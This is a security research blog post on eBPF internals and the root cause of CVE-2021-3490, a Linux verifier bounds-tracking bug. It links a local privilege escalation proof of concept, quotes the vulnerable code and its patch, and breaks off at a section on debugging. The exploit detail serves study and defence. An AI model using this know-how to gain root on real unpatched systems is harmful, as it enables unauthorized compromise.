<p style="text-align: center;"><sub><i>Original Date Published: July 29, 2021</i></sub></p>

![[61bb54daa8d73b1a87764a19_kernel-pwning.png]]

Find the released local privilege escalation (LPE) Proof-of-Concept for [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490) [here](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490). It targets Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58 and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17.

This blog post is intended to give a detailed overview of eBPF from the perspective of an exploit developer. In this post, I cover:

- The basics of how eBPF works
- The internals of the eBPF verifier
- A vulnerability ([CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490)) I exploit for local privilege escalation [ [13]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490)
- Debugging eBPF bytecode
- Exploitation techniques for DoS, information leak, and LPE
- Some interesting observations and other bugs I discovered
- New mitigations that make the bug class more difficult to exploit
- Weaknesses that are still present in eBPF today

I had no knowledge of eBPF going into this. My hope is that by sharing a PoC as well as my experience developing it, I can help others understand eBPF exploitation.

## eBPF: a Primer

### Extended Berkeley Packet Filter: What is it?

Berkeley Packet Filter (BPF) was initially created as a way to perform packet filtering in the kernel. Its capabilities were later redesigned and extended to create extended Berkeley Packet Filter (eBPF) [ [1]](https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/). Put simply, eBPF provides a way for a user mode application to run code in the kernel without needing to write a kernel module. The purported benefits of using eBPF versus a kernel module are ease of use, stability, and security. There are also performance improvements gained by doing certain tasks directly in the kernel compared to a pure user mode program. eBPF programs are used to do a myriad of things such as: tracing, instrumentation, hooking system calls, debugging, and of course, packet capturing/filtering.

eBPF programs are written in a high level language and compiled into eBPF bytecode using a toolchain (such as [BCC [18]](https://github.com/iovisor/bcc)). The eBPF VM uses a simple instruction set that uses eleven* 64-bit registers, a program counter, and a 512 byte fixed-size stack. Nine registers are general purpose read-write, one is a read-only stack pointer, and the program counter is implicit [ [2]](https://www.collabora.com/news-and-blog/blog/2019/04/15/an-ebpf-overview-part-2-machine-and-bytecode/). The instruction set is similar to x86, and operates on both 64 and 32 bit values.

```
BPF_MOV64_IMM(BPF_REG_0, 0)
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1)
BPF_MOV32_IMM(BPF_REG_3, 0xFFFFFFFF)
```

<p style="text-align: center;"><sub><i>Example of eBPF bytecode instructions</i></sub></p>

_*Technically, it uses [12 registers](https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/bpf.h#L65), but the 12th register is an auxiliary register only used to perform ALU sanitation operations [ [12]](https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/bpf.h#L65)._
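Each macro in the example above is just shorthand for one fixed-size `struct bpf_insn`. As a point of reference, here is the instruction layout from the UAPI headers and, as a rough sketch, what `BPF_MOV64_IMM(BPF_REG_0, 0)` expands to (the real macro definitions live in `include/linux/filter.h`):

```
#include <linux/bpf.h> /* struct bpf_insn, BPF_ALU64, BPF_MOV, BPF_K, BPF_REG_0 */

/* struct bpf_insn, as defined in include/uapi/linux/bpf.h:
 *
 *   struct bpf_insn {
 *       __u8    code;       // opcode
 *       __u8    dst_reg:4;  // destination register
 *       __u8    src_reg:4;  // source register
 *       __s16   off;        // signed offset
 *       __s32   imm;        // signed immediate constant
 *   };
 *
 * BPF_MOV64_IMM(BPF_REG_0, 0) is roughly equivalent to:
 */
struct bpf_insn mov64_imm_r0_0 = {
    .code    = BPF_ALU64 | BPF_MOV | BPF_K, /* 64 bit mov of an immediate */
    .dst_reg = BPF_REG_0,
    .src_reg = 0,
    .off     = 0,
    .imm     = 0,
};
```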
A user mode application loads the bytecode into the kernel using the [bpf()](https://man7.org/linux/man-pages/man2/bpf.2.html) [ [14]](https://man7.org/linux/man-pages/man2/bpf.2.html) syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical - eBPF exposes a path for unprivileged users to execute in ring0.

After the program is loaded, the user mode application attaches the program to a “hook point”. A hook point is a place in the kernel where eBPF programs can be attached [ [5]](https://blog.stackpath.com/bpf-hook-points-part-1/). eBPF programs are event driven, meaning the program will execute when certain events occur at the hook point. The classic use case is attaching an eBPF program to a socket, where the program will execute when data is written to it.

If the `kconfig` knob `CONFIG_BPF_JIT` is set, the eBPF program is JIT compiled into native assembly instructions after it is verified and loaded. Otherwise, when the program is executed it is run in the eBPF interpreter, which decodes and executes the eBPF bytecode instructions.

User mode applications can interact with and get data from the eBPF program running in the kernel using eBPF maps and eBPF helper functions, which are accessed via the `bpf()` syscall.

![[61bb5ce172eeb46875b05550_aa91b3_acc28516124a42beb6e77a38f7c6038a_mv2.png]]
<p style="text-align: center;"><sub><i>Illustration of a user space application loading and interacting with an eBPF program</i></sub></p>

The `sysctl` knob `kernel.unprivileged_bpf_disabled` determines whether unprivileged users are allowed to run eBPF programs. If it is not set, unprivileged users are allowed to attach an eBPF program to a socket that the user owns. In many Linux distributions, such as Ubuntu, `unprivileged_bpf_disabled` is not enabled by default. Because of this, I decided to look into eBPF more closely, as allowing unprivileged users to run code in the kernel is a ripe attack surface.

### eBPF Maps

I mentioned above that user mode processes can interact with an eBPF program in the kernel using eBPF maps. They can also be used by multiple eBPF programs to interact with each other. They are a generic key/value store with an arbitrary data structure [ [6]](https://prototype-kernel.readthedocs.io/en/latest/bpf/ebpf_maps.html). There are various types of maps including: arrays, queues, and stacks.

A map is described by five different attributes:

- `type` - the data structure of the map
- `key_size` - the size in bytes of the key used to index an element (used in array maps)
- `value_size` - the size in bytes of each element
- `max_entries` - the maximum number of entries in the map
- `map_flags` - describes special characteristics of the map, such as if the entire map memory should be preallocated or not

eBPF maps can be created and altered from user space via the `bpf()` syscall: a map is created using the `BPF_MAP_CREATE` command, updated using the `BPF_MAP_UPDATE_ELEM` command, and its contents are retrieved using the `BPF_MAP_LOOKUP_ELEM` command. eBPF maps can be accessed by eBPF programs using the file descriptor returned by `BPF_MAP_CREATE` and calling eBPF helper functions, which will return pointers to values within the map.
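As a deliberately minimal sketch of that user space side (not code from the PoC), the snippet below creates an array map and then updates and reads back one element through the `bpf()` syscall. The element sizes are arbitrary and error handling is omitted:

```
#include <linux/bpf.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Thin wrapper around the bpf() syscall. */
static long bpf(int cmd, union bpf_attr *attr, unsigned int size)
{
    return syscall(__NR_bpf, cmd, attr, size);
}

int main(void)
{
    union bpf_attr attr;
    uint32_t key = 0;
    uint64_t value = 0x1122334455667788ULL;
    uint64_t readback = 0;
    int map_fd;

    /* BPF_MAP_CREATE: an array map with 4-byte keys and 8-byte values. */
    memset(&attr, 0, sizeof(attr));
    attr.map_type    = BPF_MAP_TYPE_ARRAY;
    attr.key_size    = sizeof(key);
    attr.value_size  = sizeof(value);
    attr.max_entries = 1;
    map_fd = bpf(BPF_MAP_CREATE, &attr, sizeof(attr));

    /* BPF_MAP_UPDATE_ELEM: write value into element 0. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key    = (uint64_t)(unsigned long)&key;
    attr.value  = (uint64_t)(unsigned long)&value;
    attr.flags  = BPF_ANY;
    bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));

    /* BPF_MAP_LOOKUP_ELEM: read element 0 back out. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key    = (uint64_t)(unsigned long)&key;
    attr.value  = (uint64_t)(unsigned long)&readback;
    bpf(BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));

    return 0;
}
```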
### The eBPF Verifier

The exploit I wrote leverages a bug in the eBPF verifier. So before I delve into the vulnerability it is important to briefly explain the internals of the verifier.

The verifier starts by building a control flow graph of the program. Then, it will verify each instruction is valid and all memory accesses are safe through each possible flow of control [ [3]](https://www.spinics.net/lists/xdp-newbies/msg00185.html). Afterwards, it will add in runtime checks to the program. This process, called ALU Sanitation, inserts patches to the eBPF bytecode to ensure permitted memory ranges are not violated during runtime when performing pointer arithmetic [ [4]](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification).

The verifier tries to enforce this general set of rules:

- No back edges, loops, or unreachable instructions.
- No pointer comparisons can be performed, and only scalar values can be added or subtracted to a pointer. A scalar value in the eBPF verifier is any value that is not derived from a pointer. The verifier keeps track of which registers contain pointers and which contain scalar values.
- Pointer arithmetic can not leave the “safe” bounds of a map. Meaning, the program can not access anything outside the predefined map memory. To do so, the verifier keeps track of the upper and lower bounds of the values for each register.
- No pointers can be stored in maps or stored as a return value, in order to avoid leaking kernel addresses to user space.

### Range Tracking

The verifier stores the following bound values, for every register in each possible path of execution, to ensure there are no out-of-bound memory accesses:

- `umin_value`, `umax_value` store the min/max value of the register when interpreted as an unsigned (64 bit) integer
- `smin_value`, `smax_value` store the min/max value of the register when interpreted as a signed (64 bit) integer
- `u32_min_value`, `u32_max_value` store the min/max value of the register when interpreted as an unsigned (32 bit) integer
- `s32_min_value`, `s32_max_value` store the min/max value of the register when interpreted as a signed (32 bit) integer
- `var_off` contains information about the bits of the register that are known. It is stored in a structure called `tnum`, which contains two 64 bit fields: `mask` and `value`. Every bit that is set in `mask` means the value of that bit is unknown. The unset bits are known, and their true values are stored in `value`.

For example, if `var_off = {mask = 0x0; value = 0x1}`, all bits of the register are known, and the register is known to have a value of `1`. If `var_off = {mask = 0xFFFFFFFF00000000; value = 0x3}`, it means that the lower 32 bits of the register are known to be `0x00000003` and the upper 32 bits are unknown.

These bounds are used to update each other. In particular, if `var_off` indicates the register is a known constant, the min/max bounds are updated to reflect the known value. We will see why this is important later!
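For reference, the `tnum` ("tracked number") structure itself is tiny. The sketch below mirrors its layout from `include/linux/tnum.h` and shows the two example states just described, written out as C initializers:

```
#include <stdint.h>

/* Mirrors struct tnum from include/linux/tnum.h: every bit set in mask is
 * unknown; for the known bits, the true bit values are stored in value. */
struct tnum {
    uint64_t value;
    uint64_t mask;
};

/* All 64 bits known, register == 1. */
static const struct tnum known_one = {
    .value = 0x1,
    .mask  = 0x0,
};

/* Lower 32 bits known to be 0x00000003, upper 32 bits unknown. */
static const struct tnum lower_bits_known = {
    .value = 0x3,
    .mask  = 0xFFFFFFFF00000000ULL,
};
```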
### ALU Sanitation

ALU Sanitation is a feature that was introduced to supplement the static range tracking of the verifier. The idea is to prevent OOB memory accesses if the values of registers do not fall within their expected range during runtime. This was added to help mitigate potential vulnerabilities in the verifier and protect against speculative attacks.

For every arithmetic operation that involves a pointer and a scalar register, an `alu_limit` is calculated. This represents the maximum absolute value that can be added to or subtracted from the pointer [ [4]](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification). Before each of these operations, the bytecode is patched with the following instructions:

```
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
```

Note that `off_reg` represents the scalar register being added to the pointer register, and `BPF_REG_AX` represents the auxiliary register. The above instructions do the following:

1. The value of `alu_limit` is loaded into `BPF_REG_AX`.
2. The value of `off_reg` at runtime is subtracted from `alu_limit` and stored into `BPF_REG_AX`. If `off_reg > alu_limit`, the highest bit of `BPF_REG_AX` is set (the sign bit).
3. If the difference stored in `BPF_REG_AX` is positive and `off_reg` is negative, indicating that `alu_limit` and the register’s value have opposing signs, the `BPF_OR` operation will set the sign bit.
4. The `BPF_NEG` operation will negate the sign bit. If the sign bit is set, it will become 0, and if not, it will become 1.
5. The `BPF_ARSH` operation does an arithmetic right shift of 63 bits. This fills `BPF_REG_AX` with either all 0s or 1s, the value of the sign bit.
6. Depending on the result of the above operation, the `BPF_AND` operation will either null out `off_reg` or leave it unchanged.

This means that if `off_reg` exceeds `alu_limit`, or if `off_reg` and `alu_limit` have opposing signs, the value of `off_reg` will be replaced with 0, nulling the pointer arithmetic operation.

**alu_limit Computation:**

The way `alu_limit` is calculated was [recently updated](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0) [ [15]](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0). The new implementation may not have been adopted yet by some Linux distributions. For completeness, I will cover both, and revisit why the differences matter as they become relevant in the next sections.

**Previously:** The `alu_limit` is determined by the boundaries of the _pointer_ register. Meaning, if the pointer register points to the beginning of a map, the `alu_limit` for subtraction is 0, and the `alu_limit` for addition is equal to the size of the map (minus 1). The `alu_limit` is updated with subsequent operations on the pointer register.

**Now:** The `alu_limit` is determined by the boundaries of the _offset_ register. Meaning, the value of the offset register at runtime is compared against the register’s boundaries computed during the verifier’s static range tracking.

_My initial knowledge of the eBPF verifier came from this excellent [blog post](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification) by Manfred Paul detailing his exploitation of CVE-2020-8835. I highly recommend checking it out!_
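To make the masking sequence above concrete, here is a small user space model of the six patched instructions (an illustrative sketch only, not kernel code). It assumes the compiler performs an arithmetic right shift on signed values, as gcc and clang do on x86-64:

```
#include <stdint.h>
#include <stdio.h>

/* Returns the offset that actually gets used in the pointer arithmetic at
 * runtime: off_reg itself if it is within [0, alu_limit], and 0 otherwise. */
static int64_t alu_sanitize(int64_t off_reg, uint32_t alu_limit)
{
    int64_t ax;

    ax = alu_limit;          /* BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit)   */
    ax -= off_reg;           /* BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg) */
    ax |= off_reg;           /* BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg)  */
    ax = -ax;                /* BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0)       */
    ax >>= 63;               /* BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63)     */
    return ax & off_reg;     /* BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg) */
}

int main(void)
{
    printf("%lld\n", (long long)alu_sanitize(16, 100));  /* within limit  -> 16 */
    printf("%lld\n", (long long)alu_sanitize(200, 100)); /* over limit    -> 0  */
    printf("%lld\n", (long long)alu_sanitize(-8, 100));  /* opposing sign -> 0  */
    return 0;
}
```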
## The Vulnerability

We now have enough background to do a root cause analysis of [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490).

Recall that the eBPF instruction set can operate on both the entire 64 bits of registers or just the lower 32 bits. For this reason, the verifier range tracking contains separate bounds for the lower 32 bits of a register: `{u,s}32_{min,max}_value`. These bounds are updated for every operation. Each operation has two tracking functions: a 64 bit and a 32 bit counterpart. Both are called for a 64 bit operation in the function [`adjust_scalar_min_max_vals`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7479).

```
/* WARNING: This function does calculations on 64-bit values, but the actual
 * execution may occur on 32-bit values. Therefore, things like bitshifts
 * need extra checks in the 32-bit case.
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
				      struct bpf_insn *insn,
				      struct bpf_reg_state *dst_reg,
				      struct bpf_reg_state src_reg)
{
...
	case BPF_AND:
		dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
		scalar32_min_max_and(dst_reg, &src_reg);
		scalar_min_max_and(dst_reg, &src_reg);
		break;
	case BPF_OR:
		dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
		scalar32_min_max_or(dst_reg, &src_reg);
		scalar_min_max_or(dst_reg, &src_reg);
		break;
	case BPF_XOR:
		dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
		scalar32_min_max_xor(dst_reg, &src_reg);
		scalar_min_max_xor(dst_reg, &src_reg);
		break;
...
}
```

The bug, [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490), is found in the 32 bit tracking functions for the `BPF_AND`, `BPF_OR`, and `BPF_XOR` operations. It is the same in each of the functions. Let’s take a look at an excerpt of the [offending code](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7080) for `BPF_AND`:

```
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
				 struct bpf_reg_state *src_reg)
{
	bool src_known = tnum_subreg_is_const(src_reg->var_off);
	bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
	struct tnum var32_off = tnum_subreg(dst_reg->var_off);
	s32 smin_val = src_reg->s32_min_value;
	u32 umax_val = src_reg->u32_max_value;

	/* Assuming scalar64_min_max_and will be called so its safe
	 * to skip updating register for known 32-bit case.
	 */
	if (src_known && dst_known)
		return;
...
}
```

As shown in the code snippet above, if the lower 32 bits of both the source and destination register are known, the function skips updating the 32 bit bounds. The comment above the return states that this is OK, because the [64 bit counterpart](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7116) will take care of it. Let’s take a look:

```
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
			       struct bpf_reg_state *src_reg)
{
	bool src_known = tnum_is_const(src_reg->var_off);
	bool dst_known = tnum_is_const(dst_reg->var_off);
	s64 smin_val = src_reg->smin_value;
	u64 umin_val = src_reg->umin_value;

	if (src_known && dst_known) {
		__mark_reg_known(dst_reg, dst_reg->var_off.value);
		return;
	}
...
}
```

Indeed, we can see that if `src_known` and `dst_known` are true, the function `__mark_reg_known` will be called. Can you spot the problem?

In `scalar32_min_max_and`, the _known_ variables are calculated using `tnum_subreg_is_const`. The 64 bit counterpart, `scalar_min_max_and`, uses `tnum_is_const`. The difference is that the former returns true if the lower 32 bits of the register are known constants, and the latter returns true only if the entire 64 bits are constant. If the operation involves registers where the lower 32 bits are known but the upper 32 bits are unknown, the assumption stated in the comment is violated.
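The two predicates differ only in how much of the register they examine. Below is a user space paraphrase of the helpers from `include/linux/tnum.h` (a sketch, not the kernel code verbatim), applied to the kind of register state that breaks the assumption:

```
#include <stdbool.h>
#include <stdint.h>

struct tnum {
    uint64_t value;
    uint64_t mask;
};

/* True only if all 64 bits are known. */
static bool tnum_is_const(struct tnum a)
{
    return !a.mask;
}

/* Truncate to the lower 32 bits (the "subregister"). */
static struct tnum tnum_subreg(struct tnum a)
{
    return (struct tnum){ .value = (uint32_t)a.value, .mask = (uint32_t)a.mask };
}

/* True if just the lower 32 bits are known. */
static bool tnum_subreg_is_const(struct tnum a)
{
    return !tnum_subreg(a).mask;
}

/* A register whose lower 32 bits are known to be 1 but whose upper 32 bits
 * are unknown:
 *   tnum_subreg_is_const() -> true   (scalar32_min_max_and() bails out)
 *   tnum_is_const()        -> false  (scalar_min_max_and() never fixes up
 *                                     the 32 bit bounds either)
 */
static const struct tnum trigger = { .value = 0x1, .mask = 0xFFFFFFFF00000000ULL };
```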
In the function `adjust_scalar_min_max_vals`, before returning, the bounds of the destination register are updated one last time by calling the [following three functions](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7638):

```
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);

return 0;
```

Each of these functions has 32 and 64 bit counterparts. I’ll just cover the 32 bit case, since that is what the bug affects. First, the register’s bounds are [updated using the current bounds](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1229) and `var_off`.

```
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
	struct tnum var32_off = tnum_subreg(reg->var_off);

	/* min signed is max(sign bit) | min(other bits) */
	reg->s32_min_value = max_t(s32, reg->s32_min_value,
			var32_off.value | (var32_off.mask & S32_MIN));
	/* max signed is min(sign bit) | max(other bits) */
	reg->s32_max_value = min_t(s32, reg->s32_max_value,
			var32_off.value | (var32_off.mask & S32_MAX));
	reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
	reg->u32_max_value = min(reg->u32_max_value,
				 (u32)(var32_off.value | var32_off.mask));
}
```

Notice that the min bounds are set to either the current min or the known value of the register, whichever is larger. Similarly, the max bounds are set to either the current max or the known value of the register, whichever is smaller.

Then, the signed and unsigned bounds are used to update each other in [`__reg32_deduce_bounds`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1264).

```
/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
	/* Learn sign from signed bounds.
	 * If we cannot cross the sign boundary, then signed and unsigned bounds
	 * are the same, so combine. This works even in the negative case, e.g.
	 * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
	 */
	if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
		reg->s32_min_value = reg->u32_min_value =
			max_t(u32, reg->s32_min_value, reg->u32_min_value);
		reg->s32_max_value = reg->u32_max_value =
			min_t(u32, reg->s32_max_value, reg->u32_max_value);
		return;
	}
...
}
```

Finally, the unsigned bounds are used to update `var_off` in [`__reg_bound_offset`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1339).

```
/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
	struct tnum var64_off = tnum_intersect(reg->var_off,
					       tnum_range(reg->umin_value,
							  reg->umax_value));
	struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
					       tnum_range(reg->u32_min_value,
							  reg->u32_max_value));

	reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}
```

Here (both helpers are sketched just below):

- `tnum_range` returns a `tnum` representing the possible values given a range of unsigned integers.
- `tnum_intersect` takes two `tnum`s and combines the knowledge conveyed by both into a single `tnum`.
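Both helpers are short. The following is a user space paraphrase of their implementations in `kernel/bpf/tnum.c` (a sketch for illustration; the kernel versions use `fls64()` and the `TNUM()` macro):

```
#include <stdint.h>

struct tnum {
    uint64_t value;
    uint64_t mask;
};

/* Position of the highest set bit (1-based), 0 if x == 0. */
static int fls64_(uint64_t x)
{
    int n = 0;

    while (x) {
        x >>= 1;
        n++;
    }
    return n;
}

/* Returns a tnum covering every value in [min, max]. When min == max the
 * result is a fully known constant, which matters for the analysis later. */
static struct tnum tnum_range(uint64_t min, uint64_t max)
{
    uint64_t chi = min ^ max, delta;
    int bits = fls64_(chi);

    if (bits > 63)                      /* 1ULL << 64 is undefined */
        return (struct tnum){ .value = 0, .mask = ~0ULL };
    delta = (1ULL << bits) - 1;         /* low bits that may differ */
    return (struct tnum){ .value = min & ~delta, .mask = delta };
}

/* Combines the knowledge of two tnums describing the same value: a bit is
 * known in the result if it is known in either input. */
static struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
    uint64_t v  = a.value | b.value;
    uint64_t mu = a.mask & b.mask;

    return (struct tnum){ .value = v & ~mu, .mask = mu };
}
```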
Let’s go through the steps using an example so we can understand why this is a critical vulnerability. Suppose we have the instruction `BPF_ALU64_REG(BPF_AND, R2, R3)`. This instruction performs an `AND` operation on registers `R2` and `R3` and saves the result in `R2`.

- `R2` has `var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}`, meaning the lower 32 bits are known to have a value of `1`, and the upper 32 bits are unknown. Because the lower 32 bits of the register are known, its 32 bit bounds are equal to that value.
- `R3` has `var_off = {mask = 0x0; value = 0x100000002}`, meaning the entire 64 bits are known and equal to `0x100000002`.

The steps to update the 32 bit bounds of `R2` are as follows:

1. As shown in the snippet of `adjust_scalar_min_max_vals` above, the function `tnum_and` is called first. This will perform an `AND` operation and save the result in `var_off` of the destination register, `R2`. Recall, the lower 32 bits in both of the registers are known. All of the bits of `R3` are known: the upper 31 bits are `0`, and the 32nd bit is `1`. This means that `R2` is left with `var_off = {mask = 0x100000000; value = 0x0}`. This is because `2 & 1 = 0` (for the lower 32 bits), and all of the upper bits except the 32nd will be known to be `0`; the 32nd bit remains unknown, since `R3` has a `1` there and the corresponding bit of `R2` is unknown.
2. On the next line, `scalar32_min_max_and` is called. We already know that this function will return immediately and make no changes to the bounds, because the lower 32 bits of both registers are known.
3. Then, `__update_reg32_bounds` is called. This will set `u32_max_value = 0`, because `var_off.value = 0 < u32_max_value = 1`. Similarly, `u32_min_value` stays at `1`, because `var_off.value = 0 < u32_min_value`. The same goes for the signed bounds.
4. The functions `__reg32_deduce_bounds` and `__reg_bound_offset` will not make any changes to the bounds.

Now we can see that in this case, we are left with a register where: `{u,s}32_max_value = 0 < {u,s}32_min_value = 1`

Now, let’s look at the patch.

```
@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
 	s32 smin_val = src_reg->s32_min_value;
 	u32 umax_val = src_reg->u32_max_value;
 
-	/* Assuming scalar64_min_max_and will be called so its safe
-	 * to skip updating register for known 32-bit case.
-	 */
-	if (src_known && dst_known)
+	if (src_known && dst_known) {
+		__mark_reg32_known(dst_reg, var32_off.value);
 		return;
+	}
```

Above we can see that now, `__mark_reg32_known` is called on the destination register before returning if the lower 32 bits of the source and destination register are known constants. Why does this matter? Let’s take a look at what [`__mark_reg32_known`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L1093) does:

```
/* Mark the unknown part of a register (variable offset or scalar value) as
 * known to have the value @imm.
 */
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
	reg->var_off = tnum_const_subreg(reg->var_off, imm);
	reg->s32_min_value = (s32)imm;
	reg->s32_max_value = (s32)imm;
	reg->u32_min_value = (u32)imm;
	reg->u32_max_value = (u32)imm;
}
```

The function above sets all of the 32 bit boundaries to the value of the register’s lower 32 bits, which are known to be constant. The correct bounds will be preserved when the final boundary updating functions are called, fixing the bug.
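As a sanity check of the walkthrough above, the sketch below models just the two steps that matter for the example — `tnum_and` followed by the unsigned half of `__update_reg32_bounds` — in plain user space C (a simplified model, not kernel code). It ends up with `u32_min_value = 1 > u32_max_value = 0`:

```
#include <stdint.h>
#include <stdio.h>

struct tnum { uint64_t value, mask; };

/* Paraphrase of the kernel's tnum_and(): the known result bits are the AND of
 * the known bits; a result bit stays unknown only if it could be 1 in both
 * inputs and is not already known to be 1. */
static struct tnum tnum_and(struct tnum a, struct tnum b)
{
    uint64_t alpha = a.value | a.mask;
    uint64_t beta  = b.value | b.mask;
    uint64_t v     = a.value & b.value;

    return (struct tnum){ .value = v, .mask = alpha & beta & ~v };
}

int main(void)
{
    /* R2: lower 32 bits known == 1, upper 32 bits unknown. */
    struct tnum r2 = { .value = 0x1, .mask = 0xFFFFFFFF00000000ULL };
    /* R3: fully known constant 0x100000002. */
    struct tnum r3 = { .value = 0x100000002ULL, .mask = 0x0 };

    /* 32 bit bounds of R2 before the operation (lower 32 bits known == 1). */
    uint32_t u32_min = 1, u32_max = 1;

    /* Step 1: dst_reg->var_off = tnum_and(...). scalar32_min_max_and() then
     * bails out because both subregisters are "known" (the bug). */
    struct tnum dst = tnum_and(r2, r3);          /* {value = 0, mask = 0x100000000} */

    /* Step 3: the unsigned part of __update_reg32_bounds() on the subregister. */
    uint32_t var32_value = (uint32_t)dst.value;  /* 0 */
    uint32_t var32_mask  = (uint32_t)dst.mask;   /* 0 */
    if (var32_value > u32_min)
        u32_min = var32_value;                   /* stays 1 */
    if ((var32_value | var32_mask) < u32_max)
        u32_max = var32_value | var32_mask;      /* becomes 0 */

    printf("u32_min_value = %u, u32_max_value = %u\n", u32_min, u32_max); /* 1, 0 */
    return 0;
}
```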
## Debugging eBPF Programs

Before getting into exploitation, I’ll briefly cover a couple of ways to debug eBPF programs when writing exploits. I specifically say “when writing exploits”, because there are many tools available to help write and debug eBPF programs for legitimate uses, via emulation. One such tool is [rbpf [10]](https://github.com/qmonnet/rbpf), which is a Rust user space virtual machine for eBPF. However, because I exploited a bug in the eBPF verifier, it was important to be able to debug it directly in the kernel to replicate the exact behavior. Additionally, I wrote the bytecode by hand (as opposed to using a toolchain to compile a program into bytecode), so it made using these tools less practical.

### Verifier Log Output

When loading an eBPF program, you have the option to specify a log level and a buffer to receive log output from the verifier.

```
char verifier_log_buff[0x200000] = {0};

union bpf_attr prog_attrs =
{
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = cnt,
    .insns = (uint64_t)insn,
    .license = (uint64_t)"",
    .log_level = 2,
    .log_size = sizeof(verifier_log_buff),
    .log_buf = (uint64_t)verifier_log_buff
};
```

This is useful for debugging loading failures when the verifier rejects the program.

```
34: (bf) r6 = r3
